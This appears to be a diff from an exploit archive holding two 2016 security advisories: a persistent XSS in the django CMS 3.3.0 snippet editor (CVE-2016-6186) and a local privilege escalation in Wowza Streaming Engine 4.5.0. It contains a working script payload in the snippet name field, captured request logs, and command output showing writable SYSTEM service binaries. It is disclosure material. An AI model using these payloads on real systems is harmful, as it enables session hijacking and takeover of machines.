 Django CMS v3.3.0 - (Editor Snippet) Persistent Web Vulnerability
 References (Source):
 ====================
 http://www.vulnerability-lab.com/get_content.php?id=1869
 Security Release: https://www.djangoproject.com/weblog/2016/jul/18/security-releases/
 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6186
 CVE-ID:
 =======
 CVE-2016-6186
 Release Date:
 =============
 2016-07-19
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 1869
 Common Vulnerability Scoring System:
 ====================================
 3.5
 Product & Service Introduction:
 ===============================
 django CMS is a modern web publishing platform built with Django, the web application framework for perfectionists with deadlines.
 django CMS offers out-of-the-box support for the common features you’d expect from a CMS, but can also be easily customised and 
 extended by developers to create a site that is tailored to their precise needs.
 (Copy of the Homepage: http://docs.django-cms.org/en/release-3.3.x/upgrade/3.3.html )
 Abstract Advisory Information:
 ==============================
 The vulnerability laboratory core research team discovered an application-side vulnerability (CVE-2016-6186) in the official Django v3.3.0 Content Management System.
 Vulnerability Disclosure Timeline:
 ==================================
 2016-07-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
 2016-07-04 Vendor Notification (Django Security Team)
 2016-07-07: Vendor Response/Feedback (Django Security Team)
 2016-07-18: Vendor Fix/Patch (Django Service Developer Team)
 2016-07-19: Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 Divio AG
 Product: Django Framework - Content Management System 3.3.0
 Divio AG
 Product: Django Framework - Content Management System MDB, 1.10, 1.9, 1.8 and 1.7
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 Technical Details & Description:
 ================================
 A persistent input validation web vulnerability has been discovered in the official Django v3.3.0 Content Management System.
 The security vulnerability allows remote attackers or privileged user accounts to inject own malicious script codes to the 
 application-side of the vulnerable modules web context.
 The persistent web vulnerability is located in the `Name` value of the `Editors - Code Snippet` module POST method request. 
 Remote attackers are able to inject own malicious script code to the snippets name input field to provoke a persistent execution. 
 The injection point is the snippets add module of the editor. The execution point occurs in the `./djangocms_snippet/snippet/` 
 data listing after the add. The data context is not escaped or parsed on add to select and thus results in an execute of any 
 payload inside of the option tag.
 The attacker vector of the vulnerability is persistent because of the data is stored on add and request method to inject is POST.
 The vulnerability can be exploited against other privileged user accounts of the django application by interaction with already 
 existing snippets on add. 
 Already added elements become visible for the other user accounts as well on add interaction. The unescaped data is stored in 
 the database of the web-application but when rendered in the frontend or in the edit mode, it's properly escaped.
 The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. 
 Exploitation of the vulnerability requires a low privileged web-application user account and only low user interaction. 
 Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external 
 redirects to malicious source and persistent manipulation of affected or connected application modules.
 Request Method(s):
 				[+] POST
 Vulnerable Module(s):
 				[+] Editor - Snippets (Add)
 Vulnerable Input(s):
 				[+] Name
 Parameter(s):
 				[+] select
 Affected Module(s):
 				[+] Snippets Options Listing [./djangocms_snippet/snippet/] - option
 Proof of Concept (PoC):
 =======================
 The application-side validation web vulnerability can be exploited by low and high privileged web-application user accounts with low user interaction.
 For security demonstration or to reproduce the application-side web vulnerability follow the provided information and steps below to continue.
 Manual steps to reproduce the vulnerability ...
 1. Login to your django cms website with version 3.3.0
 2. Open the structure module
 3. Click to edit a page module
 Note: Now the editor opens with the main default plugins
 4. Mark a text passage and click to the code snippets plugin that is configured by default installation
 5. Click the plus to add a new snippet of code
 6. Inject a script code payload in java-script to the input field of the Name
 7. Save the entry iva POST method request
 8. Now click the box to choose the vulnerable injected payload
 9. The script code payload executes in the box listing without secure parse or filter to encode
 10. Successful reproduce of the application-side validation vulnerability in the editors snippet module!
 Note: 
 Multiple accounts can be exploited by the inject of snippets. When another privileged user account includes a snippet 
 the stable saved categories provoke the execution of the payload.
 PoC: Snippet Module [./djangocms_snippet/snippet/] (Execution Point) <select> <option>
 ...
 <fieldset class="module aligned ">
 <div class="form-row field-snippet">
 <div>        
 <label class="required" for="id_snippet">Snippet:</label>                    
 <div class="related-widget-wrapper">
 <select id="id_snippet" name="snippet">
 <option value="">---------</option>
 <option value="3" selected="selected">"><"<img src="x">%20%20>"<iframe src="a">%20<iframe>  
 "><"<img src="x">%20%20>"<iframe src=http://www.vulnerability-lab.com onload=alert(document.cookie)<>[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]%20<iframe></iframe></option>
 <option value="1">Social AddThis</option>
 <option value="2">tour "><"<img src="x">%20%20>"<iframe src=a>%20<iframe></option>
 </select> 
 <a href="/en/admin/djangocms_snippet/snippet/3/?_to_field=id&_popup=1" class="related-widget-wrapper-link change-related" 
 id="change_id_snippet" data-href-template="/en/admin/djangocms_snippet/snippet/__fk__/?_to_field=id&_popup=1" title="Change selected Snippet">
 <img src="/static/admin/img/icon_changelink.gif" alt="Change" height="10" width="10">
 </a>
 <a class="related-widget-wrapper-link add-related" id="add_id_snippet" href="/en/admin/djangocms_snippet/snippet/add/?_to_field=id&_popup=1" title="Add another Snippet">
 <img src="/static/admin/img/icon_addlink.gif" alt="Add" height="10" width="10">
 </a>
 </div>
 </div>
 </div>
 </fieldset>
 ...
 --- PoC Session Logs [POST] (Injection) [GET] (Execution) ---
 Status: 200[OK]
 POST http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1 
   Request Header:    
  Host[django3-3-0.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1]
      Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
 Connection[keep-alive]
 POST-Daten:
 POSTDATA =-----------------------------30880199939743
 Content-Disposition: form-data; name="csrfmiddlewaretoken"
 LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm
 -----------------------------30880199939743
 Content-Disposition: form-data; name="_popup"
 1
 -----------------------------30880199939743
 Content-Disposition: form-data; name="_to_field"
 id
 -----------------------------30880199939743
 Content-Disposition: form-data; name="name"
 test <img src="x">%20%20>"<iframe src="a">%20<iframe>  
 "><"<img src="x">%20%20>"<iframe src=a>[PERSISTENT INJECTED SCRIPT CODE VIA SNIPPET NAME!]%20<iframe>
 -----------------------------30880199939743
 Content-Disposition: form-data; name="html"
 sd
 -----------------------------30880199939743
 Content-Disposition: form-data; name="template"
 aldryn_tour/tour.html 
 -----------------------------30880199939743
 Content-Disposition: form-data; name="slug"
 tour
 -----------------------------30880199939743
 Content-Disposition: form-data; name="_save"
 Save
 -----------------------------30880199939743-- 
 Response Header:
      Transfer-Encoding[chunked]
      X-Proxy-Request-Received[0]
      Server[Aldryn-LoadBalancer/2.0]
      Date[Mon, 04 Jul 2016 09:34:19 GMT]
      X-Aldryn-App[django-cms-3-3-demo-sopegose-stage]
      Content-Language[en]
      Expires[Mon, 04 Jul 2016 09:34:19 GMT]
      Vary[Cookie]
      Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
      Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
      X-Frame-Options[SAMEORIGIN]
      Content-Type[text/html; charset=utf-8]
      Set-Cookie[sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; expires=Mon, 18-Jul-2016 09:34:19 GMT; Max-Age=1209600; Path=/]
 -
 Status: 301[MOVED PERMANENTLY]
 GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!] 
   Request Header:
      Host[django3-3-0.localhost:8080]   
   User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
      Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
      Connection[keep-alive]
   Response Header:
      Server[Aldryn-LoadBalancer/2.0]
      Date[Mon, 04 Jul 2016 09:34:19 GMT]
      Vary[Cookie]
      X-Frame-Options[SAMEORIGIN]
      Content-Type[text/html; charset=utf-8]
      Location[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x/]
      Content-Language[en]
 -
 Status: 200[OK]
 GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/a/[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
   Request Header:
      Host[django3-3-0.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
      Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
      Connection[keep-alive]
   Response Header:
      Transfer-Encoding[chunked]
      X-Proxy-Request-Received[0]
      Server[Aldryn-LoadBalancer/2.0]
      Date[Mon, 04 Jul 2016 09:34:19 GMT]
      Content-Language[en]
      Expires[Mon, 04 Jul 2016 09:34:19 GMT]
      Vary[Cookie]
      Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
      Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
      X-Frame-Options[SAMEORIGIN]
 	Content-Type[text/html]
 Reference(s):
 http://django3-3-0.localhost:8080/
 http://django3-3-0.localhost:8080/en/
 http://django3-3-0.localhost:8080/en/admin/
 http://django3-3-0.localhost:8080/en/admin/cms/
 http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/
 http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/
 http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/
 http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/
 http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/
 http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/9/
 Solution - Fix & Patch:
 =======================
 The vulnerability can be patched by a secure parse of the vulnerable Name input field in the add snippets editor module.
 Restrict the input and disallow the usage of special chars. Escape the entries in case of emergency and use plain-text values.
 Encode in the snippets module listing the vulnerable box with the name listing to prevent the execution point of the vulnerability.
 Resolution:
 Patches to resolve the issues have been applied to Django's master development branch and the 1.10, 1.9, and 1.8 release branches. 
 The patches may be obtained from the following changesets:
 -    On the development master branch
 -    On the 1.10 release branch
 -    On the 1.9 release branch
 -    On the 1.8 release branch
 The following new releases have been issued:
 -    Django 1.10rc1
 -    Django 1.9.8
 -    Django 1.8.14
 Reference(s):
 https://developer.mozilla.org/en-US/docs/Web/API/element/innerHTML
 Security Risk:
 ==============
 The security risk of the application-side input validation web vulnerability in the django cms is estimated as medium. (CVSS 3.5)
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
 including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
 including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
 of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
 limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
 Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
 Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
 Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
 Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
 Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
 redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
 its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
 authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
 				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
 -- 
 VULNERABILITY LABORATORY - RESEARCH TEAM
 SERVICE: www.vulnerability-lab.com
 CONTACT: research@vulnerability-lab.com
--- a/platforms/windows/local/40132.txt
+++ b/platforms/windows/local/40132.txt
@ -0,0 +1,84 @@
 Wowza Streaming Engine 4.5.0 Local Privilege Escalation
 Vendor: Wowza Media Systems, LLC.
 Product web page: https://www.wowza.com
 Affected version: Wowza Streaming Engine 4.5.0 (build 18676)
                  Wowza Streaming Engine Manager 4.5.0 (build 18676)
 Summary: Wowza Streaming Engine is robust, customizable, and scalable
 server software that powers reliable video and audio streaming to any
 device. Learn the benefits of using Wowza Streaming Engine to deliver
 high-quality live and on-demand video content to any device.
 Desc: Wowza Streaming Engine suffers from an elevation of privileges
 vulnerability which can be used by a simple authenticated user that
 can change the executable file with a binary of choice. The vulnerability
 exist due to the improper permissions, with the 'F' flag (Full) for
 'Everyone' group. In combination with insecure file permissions the
 application suffers from an unquoted search path issue impacting the
 services 'WowzaStreamingEngine450' and 'WowzaStreamingEngineManager450'
 for Windows deployed as part of Wowza Streaming software.
 Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Java Version: 1.8.0_77
           Java VM Version: 25.77-b03
           Java Architecture: 64
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2016-5339
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5339.php
 03.07.2016
 --
 C:\Users\lqwrm>sc qc WowzaStreamingEngineManager450
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: WowzaStreamingEngineManager450
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wowza Streaming Engine Manager 4.5.0
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 C:\Users\lqwrm>cacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe"
 C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe Everyone:(ID)F
                                                                                                 NT AUTHORITY\SYSTEM:(ID)F
                                                                                                 BUILTIN\Administrators:(ID)F
                                                                                                 BUILTIN\Users:(ID)R
 ==========
 C:\Users\lqwrm>sc qc WowzaStreamingEngine450
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: WowzaStreamingEngine450
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wowza Streaming Engine 4.5.0
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 C:\Users\lqwrm>icacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe"
 C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe Everyone:(I)(F)
                                                                                         NT AUTHORITY\SYSTEM:(I)(F)
                                                                                         BUILTIN\Administrators:(I)(F)
                                                                                         BUILTIN\Users:(I)(RX)
 Successfully processed 1 files; Failed processing 0 files